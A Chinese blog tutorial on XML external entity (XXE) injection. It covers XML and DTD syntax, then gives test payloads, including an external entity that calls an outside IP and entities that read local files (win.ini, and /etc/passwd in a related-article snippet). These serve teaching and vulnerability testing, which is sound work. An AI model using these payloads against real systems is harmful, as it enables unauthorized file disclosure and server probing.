漏洞之XML实体注入

最新推荐文章于 2024-08-16 17:40:16 发布
最新推荐文章于 2024-08-16 17:40:16 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 漏洞研究
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/118366403
版权

XXE——XML外部实体注入

程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。

XML是可扩展标记语言,很类型HTML语言。

但是xml语言的标签没有预定义,需要自定义标签

XML 被设计用来结构化、存储以及传输信息。但是 XML 不会做任何事情。

举个栗子:张三给李四写了一张便签,标题是提醒,内容是:李四,你不要忘记开会。

<note>

<to>李四</to>

<from>张三</from>

<heading>提醒</heading>

<body>李四,你不要忘记开会!</body>

</note>

上面这个栗子说明,XML具有自我描述性,有标题、内容、发送者、接收者。

但是上面这个xml栗子没有做任何事情,它还需要我们编写软件或者程序,才能传送、接收和显示出这个文档。

XML结构

  • XML声明

  • DTD文档类型定义(可选)

  • 文档元素

XML元素

元素标记区分大小写

xml有且只有一个根元素

XXE漏洞一般发生在应用程序解析XML输入时,没有处理好外部实体的加载;

DTD

上面提到xml需要自定义标签,而DTD(文档类型定义)就可以合法的定义xml标签。

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。

DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用

内部的DOCTYPE声明:

1、举个很好的栗子:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[                           <!--定义此文档为note类型-->
	<!ELEMENT note (to,from,heading,body)><!--定义note有四个元素-->
	<!ELEMENT to   (#PCDATA)>
	<!ELEMENT from   (#PCDATA)>
	<!ELEMENT heading   (#PCDATA)>
	<!ELEMENT body   (#PCDATA)>           <!--定义元素的类型为#PCDATA-->
]>
<note>
<to>Alice</to>
<from>Bob</from>
<heading>Reminder</heading>
<body>I miss you !</body>
</note>

2、还有个栗子:

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE root[
 <!ELEMENT A   "i">
 <!ELEMENT B   "am">
 <!ELEMENT C   "hacker">
 ]>
 <root>
     <A>&A;</A>
     <B>&B;</B>
     <C>&C;</C>
 </root>

DTD文档结构

元素类型声明

属性表声明

实体声明

记号声明

DTD语法:

举个栗子:

实体声明

一、一般实体

<!ENTITY 实体名 实体内容>

二、参数实体

<!ENTITY %实体名 "实体内容">

外部的文档声明

<!DOCTYPE root-element SYSTEM "filename">

<!DOCTYPE 根元素 SYSTEM "文件名">

<!DOCTYPE root-element PUBLIC "public_ID" "filename">

<!DOCTYPE 根元素 PUBLIC "文件源" "文件名">

XML实体注入

原理:xml实体注入是DTD引用外部实体导致的漏洞

检测漏洞

1、判断xml能否解析

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is shy">
]>
<root>&name;</root>

2、判断是否支持外部调用

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [ 
<!ENTITY name SYSTEM "http://47.95.206.199/index.html">
]>
<root>&name;</root>

3、有回显情况下,读取任意文件

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE x[<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<value>&xxe;</value>

在网站的正常发送的xml前面加上一个DTD实体的声明,然后在某个标签内调用。

参考大佬链接:https://mp.weixin.qq.com/s/RkzcwzSmWBcQ6QexF2t8IA

shy014
关注
专栏目录
广联达OA接口ArchiveWebService存在XML实体注入漏洞
xiaokp7的博客
07-24 209
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达 ArchiveWebService接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
广联达Linkworks ArchiveWebService XML实体注入漏洞复现
0xSec
07-15 1932
广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
XML实体注入
weixin_55190422的博客
09-25 498
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
xml实体注入
HoAd'blog
02-01 443
xml实体注入 XXE漏洞xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 - XML被设计为传输和存储数据,其焦点是数据的内容。 - HTML被设计用来显示数据,其焦点是数据的外观。 &lt &gt &amp &apos &
【网络安全渗透测试零基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了
jennycisp的博客
07-18 1403
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段文件XXE渗透与防御第1篇。本文主要讲解XML外部实体注入XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
34-XXE(XML外部实体注入
XLbb的博客
05-19 967
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
XML 外部实体注入
2201_75370376的博客
06-22 993
SQL注入是一种web安全漏洞,使攻击者干扰应用程序对其数据库的查询。它通常使攻击者可以查看他们无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的数据发生不正常更改。在某些情况下,攻击者可以逐步扩大SQL注入攻击,以危害底层服务器或其他后端基础设施。
Web Hacking 101 中文版 十四、XML 外部实体注入(一)
热门推荐
龙哥盟
03-25 3万+
十四、XML 外部实体注入 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 XML 外部实体(XXE)漏洞涉及利用应用解析 XML 输入的方式,更具体来说,应用程序处理输入中外部实体的包含方式。为了完全理解理解如何利用,以及他的潜力。我觉得我们最好首先理解什么是 XML 和外部实体。元语言是用于描述其它语言的语言,这就是 XML。它在 H
java xml 实体注入_XML外部实体注入漏洞(XXE)
weixin_35917998的博客
02-16 1159
转自腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD根元素 [元素声明]>引...
xml实体注入代码Java_XML外部实体注入漏洞(XXE)
weixin_33331639的博客
02-27 1089
转自腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD根元素 [元素声明]>引用...
用友 NC 24处接口XML实体注入漏洞复现
0xSec
02-28 1224
用友 NC 多处接口存在XML实体注入漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
XXE漏洞-XML 外部实体注入
zeroc009的博客
02-11 2762
XXE漏洞-XML 外部实体注入xxe介绍xml基础知识新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 xxe介绍 Xml外部实体注入漏洞XML External Entity Injection)简称XXE,XXE漏洞
利用 XML 外部实体注入
blacklordking的博客
06-21 420
在现实生活中大量存在有关系的数据,XML语言出现的根本目标在于描述在现实生活中经常出现的有关系的数据。在XML语言中,它允许用户自定义标签。一个标签用于描述一段数据;一个标签可分为开始标签和结束标签,在开始标签和结束标签之间,又可以使用其它标签描述其它数据,以此来实现数据关系的描述。(在XML中,用ELEMENT表示元素,用ENTITY表示实体
XML 实体注入
YT的博客
04-02 6709
XML 的文档结构: XML 文档声明,在文档的第一行 XML 文档类型定义,即DTD,XXE 漏洞所在的地方 XML 文档元素 DTD 内部声明 DTD: <!DOCTYPE 根元素 [元素声明]> 引用外部 DTD: <!DOCTYPE 根元素 SYSTEM "文件名"> 或 <!DOCTYPE 根元素 PUBLIC "public_ID" "文件名"&g...
漏洞挖掘】——21、RPO漏洞挖掘攻防
Fly_鹏程万里
03-03 3141
Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段,其主要依赖于服务器和浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
深入浅出带你了解XML实体注入
dzqxwzoe的博客
05-12 1087
Xml外部实体注入漏洞XML External Entity Injection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以构造加载恶意外部文件,进而通过恶意外部文件对服务器进行攻击。今天比较详细的讲了XXE漏洞的原理以及应用方法,有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。## 题外话初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。
XML&XXE实体注入
q
06-18 889
转到pe_getxml用例可以看到,wechat_getxml调用了pe_getxml,相当于wechat_getxml调用了simplexml函数。使用CTRL+B快捷键转到wechat_getxml方法声明或用例,下面使用xml返回的数据都是固定的,应该是无回显。pe_getxml方法用到了simplexml,使用CTRL+B快捷键转到pe_getxml方法声明或用例。查看生成的file.txt,成功读取到c盘下123.txt。将get.php放入到服务器,将get.php放入到服务器,
XML外部实体注入
最新发布
2201_75572825的博客
08-16 1505
比如下面这个插入了“<”符号,解析器会把它当作新元素的开始,就会产生错误,为了避免这个错误,我们可以用实体引用来替代这些特殊的字符。其中,entity-name是参数实体的名称,entity-value 是参数实体的值。在这个例子中,定义了一个名为author的内部实体,它的实际内容是John Smith,在xml文档中,通过&author进行引用,并将其替换为实际内容。而在DTD中,实体是一种可以被引用的数据类型,它可以用来代替特定的字符,字符串,符号等,从而使DTD更加灵活和易于维护。
XML外部实体注入(XXE)
web1的博客
09-08 517
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全的XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值